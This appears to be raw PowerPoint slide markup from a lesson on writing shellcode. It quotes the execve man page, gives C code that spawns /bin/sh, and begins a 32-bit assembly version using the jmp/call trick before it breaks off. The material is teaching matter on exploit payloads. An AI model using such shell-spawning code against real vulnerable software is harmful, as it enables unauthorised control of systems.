                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> char *filename, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[],</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                  char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DESCRIPTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() executes the program pointed to by filename.  filename must be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       either a binary executable, or a script starting with  a  line  of  the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       form:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           #! interpreter [optional-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       For details of the latter case, see "Interpreter scripts" below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  is  an array of argument strings passed to the new program.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       is an array of strings, conventionally of the form key=value, which are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       passed  as  environment to the new program.  Both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> must be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       terminated by a null pointer.  The argument vector and environment  can</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       be  accessed  by the called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>programâs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main function, when it is defined</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[], char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="106108712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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shell-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spawning.c</a:t>
            </a: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smtClean="0"/>
              <a:t>Getting down to business</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="3105978"/>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400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  char filename[] = "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x00";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  char **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; // Arrays that contain char pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[0] = filename; // The only argument is filename.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1] = 0;  // Null terminate the argument array.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[0] = 0; // Null terminate the environment array.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(filename, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90651953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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exec_shell.asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>Getting down to business</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1551220"/>
            <a:ext cx="8352928" cy="3967753"/>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400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BITS 32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> short two     ; Jump down to the bottom for the call trick.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>one:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> char *filename, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [], char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
